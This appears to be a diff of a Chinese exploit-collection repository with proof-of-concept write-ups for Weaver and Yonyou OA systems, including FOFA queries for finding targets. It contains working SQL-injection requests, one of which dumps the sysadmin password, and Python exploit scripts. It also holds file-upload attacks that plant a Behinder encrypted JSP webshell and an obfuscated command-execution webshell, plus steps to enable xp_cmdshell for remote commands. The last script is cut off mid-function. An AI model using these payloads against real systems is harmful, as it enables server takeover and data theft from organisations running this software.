泛微 E-Office mysql_config.ini文件可直接访问泄漏数据库账号密码等信息
## 漏洞影响
```
泛微 E-Office
```
## FOFA
```
app="泛微-EOffice"
```
## 漏洞复现
产品页面
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091048925.png)
验证POC
```php
/mysql_config.ini
```
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091048869.png)

66
OA产品漏洞/泛微OA WorkflowCenterTreeData SQL注入漏洞.md Normal file
View File

@ -0,0 +1,66 @@
# 泛微OA WorkflowCenterTreeData SQL注入漏洞
## 漏洞描述
2019年10月10日CNVD发布了泛微e-cology OA系统存在SQL注入漏洞。该漏洞是由于OA系统的WorkflowCenterTreeData接口中涉及Oracle数据库的SQL语句缺乏安全检查措施所导致的任意攻击者都可借SQL语句拼接时机注入恶意payload造成SQL注入攻击。
## 影响版本
```
使用Oracle数据库的泛微服务
```
## 漏洞复现
泛型微生态OA系统的WorkflowCenterTreeData接口在使用Oracle数据库时由于内置sql语句分解不严密导致其存在的sql注入漏洞
![image-20220209103818614](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091038769.png)
漏洞请求包
```sql
POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
Host: ip:port
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ecology_JSessionId=abc49y8JvMcoqhSkCv02w; testBanCookie=test
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 2236
Upgrade-Insecure-Requests: 1
formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1
```
## 漏洞POC
```python
import requests
import sys
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Content-Type': 'application/x-www-form-urlencoded'
}
def exploit(url):
target=url+'/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333'
payload="formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1"
res=requests.post(url=target,data=payload,headers=headers,timeout=10)
res.encoding=res.apparent_encoding
print(res.text)
if __name__ == '__main__':
url=sys.argv[1]
exploit(url)
```
## 参考文章
[泛微OA WorkflowCenterTreeData接口注入复现仅限oracle数据库](https://zhuanlan.zhihu.com/p/86082614)

173
OA产品漏洞/泛微OA WorkflowServiceXml RCE.md Normal file
View File

File diff suppressed because one or more lines are too long

55
OA产品漏洞/泛微OA getdata.jsp SQL注入漏洞.md Normal file
View File

@ -0,0 +1,55 @@
# 泛微OA getdata.jsp SQL注入漏洞
## 漏洞描述
泛微OA V8 存在SQL注入漏洞攻击者可以通过漏洞获取管理员权限和服务器权限
## 漏洞影响
```
泛微OA V8
```
## FOFA
```
app="泛微-协同办公OA"
```
## 漏洞复现
在getdata.jsp中直接将request对象交给
**weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) :**
方法处理
![image-20220209104257902](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091042978.png)
在getData方法中判断请求里cmd参数是否为空如果不为空调用proc方法
![image-20220209104319947](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091043985.png)
Proc方法4个参数(“空字符串”,”cmd参数值”,request对象serverContext对象)
在proc方法中对cmd参数值进行判断当cmd值等于getSelectAllId时再从请求中获取sql和type两个参数值并将参数传递进getSelectAllIdssql,type方法中
![image-20220209104335191](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091043319.png)
根据以上代码流程,只要构造请求参数
?cmd= getSelectAllId&sql=select password as id from userinfo;
即可完成对数据库操控
POC
```plain
http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
```
查询HrmResourceManager表中的password字段页面中返回了数据库第一条记录的值sysadmin用户的password
![image-20220209104351654](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091043694.png)解密后即可登录系统
![image-20220209104408461](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091044509.png)

49
OA产品漏洞/泛微OA sysinterfacecodeEdit.jsp 任意文件上传漏洞.md Normal file
View File

@ -0,0 +1,49 @@
# 泛微OA sysinterfacecodeEdit.jsp 任意文件上传漏洞
## 漏洞描述
泛微OA sysinterface/codeEdit.jsp 页面任意文件上传导致可以上传恶意文件
## 漏洞版本
```
较老版本,目前无准确版本
```
## 漏洞复现
```
filename=******5308.java&filetype=javafilename为文件名称 为空时会自动创建一个
String fileid = "Ewv";<br>
String readonly = "";<br>
boolean isCreate = false;<br>
if(StringHelper.isEmpty(fileName)) {<br>
Date ndate = new Date();<br>
SimpleDateFormat sf = new SimpleDateFormat("yyyyMMddHHmmss");<br>
String datetime = sf.format(ndate);<br>
fileid = fileid + datetime;<br>
fileName= fileid + "." + filetype;<br>
isCreate = true;<br>
} else {<br>
int pointIndex = fileName.indexOf(".");<br>
if(pointIndex > -1) {<br>
fileid = fileName.substring(0,pointIndex);<br>
}}
```
![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091045304.png)
![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091045317.png)
![3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091045310.png)
![4](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091045312.png)
![5](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091045316.png)
## 参考文章
[泛微OA未授权可导致GetShell](https://www.uedbox.com/post/15730/)

71
OA产品漏洞/泛微OA uploadOperation.jsp 任意文件上传.md Normal file
View File

@ -0,0 +1,71 @@
# 泛微OA uploadOperation.jsp 任意文件上传
## 漏洞描述
```
泛微OA V9 存在文件上传接口导致任意文件上传
```
## 漏洞影响
```
泛微OA V9
```
## 漏洞复现
漏洞位于: /page/exportImport/uploadOperation.jsp文件中
Jsp流程大概是:判断请求是否是multipart请求,然就没有了,直接上传了,啊哈哈哈哈哈
重点关注File file=new File(savepath+filename),
Filename参数,是前台可控的,并且没有做任何过滤限制
![image-20220209104105593](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091041790.png)
利用非常简单,只要对着
/page/exportImport/uploadOperation.jsp
来一个multipartRequest就可以
![image-20220209104135755](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091041826.png)
然后请求 然后请求路径:
page/exportImport/fileTransfer/1.jsp
![image-20220209104201442](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091042495.png)
请求包
```bash
POST /page/exportImport/uploadOperation.jsp HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 397
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6XgyjB6SeCArD3Hc
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
dnt: 1
x-forwarded-for: 127.0.0.1
Connection: close
------WebKitFormBoundary6XgyjB6SeCArD3Hc
Content-Disposition: form-data; name="file"; filename="test.jsp"
Content-Type: application/octet-stream
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
------WebKitFormBoundary6XgyjB6SeCArD3Hc--
```
地址: /page/exportImport/fileTransfer/test.jsp
默认密码 rebeyond

110
OA产品漏洞/泛微OA weaver.common.Ctrl 任意文件上传漏洞.md Normal file
View File

@ -0,0 +1,110 @@
# 泛微OA weaver.common.Ctrl 任意文件上传漏洞
## 漏洞描述
泛微OA weaver.common.Ctrl 存在任意文件上传漏洞攻击者通过漏洞可以上传webshell文件控制服务器
## 漏洞影响
```
泛微OA
```
## FOFA
```
app="泛微-协同办公OA"
```
## 漏洞复现
存在漏洞的路径为
```plain
/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp
```
请求包为
![image-20220209103936690](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091039784.png)
使用POC文件上传
![image-20220209103951582](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091039689.png)
## 漏洞POC
```python
import zipfile
import random
import sys
import requests
def generate_random_str(randomlength=16):
random_str = ''
base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'
length = len(base_str) - 1
for i in range(randomlength):
random_str += base_str[random.randint(0, length)]
return random_str
mm = generate_random_str(8)
webshell_name1 = mm+'.jsp'
webshell_name2 = '../../../'+webshell_name1
def file_zip():
shell = """<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
if(request.getParameter("cmd")!=null){
BASE64Decoder decoder = new BASE64Decoder();
Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
Process e = (Process)
rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
Object[]{}), request.getParameter("cmd") );
java.io.InputStream in = e.getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("
<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
""" ## 替换shell内容
zf = zipfile.ZipFile(mm+'.zip', mode='w', compression=zipfile.ZIP_DEFLATED)
zf.writestr(webshell_name2, shell)
def GetShell(urllist):
file_zip()
print('上传文件中')
urls = urllist + '/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp'
file = [('file1', (mm+'.zip', open(mm + '.zip', 'rb'), 'application/zip'))]
requests.post(url=urls,files=file,timeout=60, verify=False)
GetShellurl = urllist+'/cloudstore/'+webshell_name1
GetShelllist = requests.get(url = GetShellurl)
if GetShelllist.status_code == 200:
print('利用成功webshell地址为:'+GetShellurl)
else:
print('未找到webshell利用失败')
def main():
if (len(sys.argv) == 2):
url = sys.argv[1]
GetShell(url)
else:
print("python3 poc.py http://xx.xx.xx.xx")
if __name__ == '__main__':
main()
```
## 参考文章
[原漏洞公开地址](https://github.com/GTX8090TI/GTX8090TI.github.io/blob/6dd04a19bbc4fcef436e0b2f05c15bc98ac0c852/2021/05/02/泛微OA-前台GetShell复现/index.html)

31
OA产品漏洞/用友 ERP-NC NCFindWeb 目录遍历漏洞.md Normal file
View File

@ -0,0 +1,31 @@
# 用友 ERP-NC NCFindWeb 目录遍历漏洞
## 漏洞描述
用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息
## 漏洞影响
```
用友ERP-NC
```
## FOFA
```
app="用友-UFIDA-NC"
```
## 漏洞复现
POC为
```plain
/NCFindWeb?service=IPreAlertConfigService&filename=
```
![yongyou-8-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-8-1.png)
查看 ncwslogin.jsp 文件
![yongyou-8-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-8-2.png)

234
OA产品漏洞/用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923.md Normal file
View File

@ -0,0 +1,234 @@
# 用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923
## 漏洞描述
用友GRP-u8存在XXE漏洞该漏洞源于应用程序解析XML输入时没有进制外部实体的加载导致可加载外部SQL语句以及命令执行
## 影响版本
```
用友GRP-U8行政事业内控管理软件新政府会计制度专版
```
## FOFA
```
title="用友GRP-U8行政事业内控管理软件"
```
## 漏洞复现
漏洞利用POC请求包
```xml
POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>
```
请求后按F12查看源代码可以得到SQL语句查询结果
![yongyou-7-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-7-1.png)
![yongyou-7-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-7-2.png)
也可以调用 **xp_cmdshell** 来执行系统命令(大部分此系统为**windows**)
![yongyou-7-3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-7-3.png)
- 注意:大部分默认是不开启 xp_cmdshell 模块的
![yongyou-7-4](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-7-4.png)
可以使用如下方法打开**xp_cmdshell方法**
将如下POST数据按顺序发送(**注意 master 改为当前数据库名**)
```xml
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">use master</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
```
```xml
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec sp_configure 'show advanced options',1</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
```
```xml
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">reconfigure</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
```
```xml
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec sp_configure 'xp_cmdshell',1</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
```
```xml
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">reconfigure</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
```
- 发送如上实际为执行SQL语句打开 xp_cmdshell
use master;
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;
再发送以下数据可成功使用(也可能失败)
```xml
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell "whoami"</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
```
- 执行过程中报错 java.sql.SQLException【错误代码: 0; 相关信息:xxxxxx】不用理会
发送请求后再使用此模块则会成功请求执行系统命令
## 漏洞POC
```python
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.tech
import requests
import re
import sys
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: 用友GRP-U8行政事业内控管理软件 \033[0m')
print('+ \033[36m使用格式: python3 CNNVD-201610-923.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+ \033[36m(Y/N) >>> Y or N \033[0m')
print('+ \033[36mcmd >>> ipconfig \033[0m')
print('+------------------------------------------')
def POC_1(target_url):
check_url = target_url + "/Proxy"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
data = """cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">select 1,user,db_name(),host_name(),@@version</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>"""
try:
print("\033[32m[o] 正在执行SQL语句:select 1,user,db_name(),host_name(),@@version...\033[0m")
response = requests.post(url=check_url, headers=headers, data=data, timeout=10)
row_1 = '<ROW COLUMN1="1"'
row_2 = r'COLUMN2="(.*?)"'
row_3 = r'COLUMN3="(.*?)"'
row_4 = r'COLUMN4="(.*?)"'
row_5 = r'COLUMN5="(.*?)"'
if row_1 in response.text and "服务器错误信息null" not in response.text:
db_user = re.findall(row_2, response.text)[0]
db_name = re.findall(row_3, response.text)[0]
db_host = re.findall(row_4, response.text)[0]
db_vers = re.findall(row_5, response.text)[0]
print("\033[32m[o] 存在漏洞,漏洞响应为:\033[0m")
print("\033[32m >> 数据库用户为:{}\033[0m".format(db_user))
print("\033[32m >> 数据库名为:{}\033[0m".format(db_name))
print("\033[32m >> 数据库主机名为:{}\033[0m".format(db_host))
print("\033[32m >> 数据库版本为:{}\033[0m".format(db_vers))
return db_name
else:
print("\033[31m[x] 漏洞已被修复 \033[0m")
sys.exit(0)
except:
print("\033[31m[x] 请求失败 \033[0m")
sys.exit(0)
def xp_cmdshell_open(target_url, db_name):
open_sql = ["use {}".format(db_name),"exec sp_configure 'show advanced options',1","reconfigure","exec sp_configure 'xp_cmdshell',1","reconfigure"]
num = 1
for sql in open_sql:
open_url = target_url + "/Proxy"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
data = 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">{}</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>'.format(sql)
try:
print("\033[32m[o] 正在执行SQL语句:{}...\033[0m".format(sql))
response = requests.post(url=open_url, headers=headers, data=data, timeout=10)
num = num + 1
if num == 5 :
POC_2(target_url, db_name)
except:
print("\033[31m[x] 开启 xp_cmdsheall 失败 \033[0m")
sys.exit(0)
def POC_2(target_url, db_name):
db_name = db_name
sql_cmd_url = target_url + "/Proxy"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
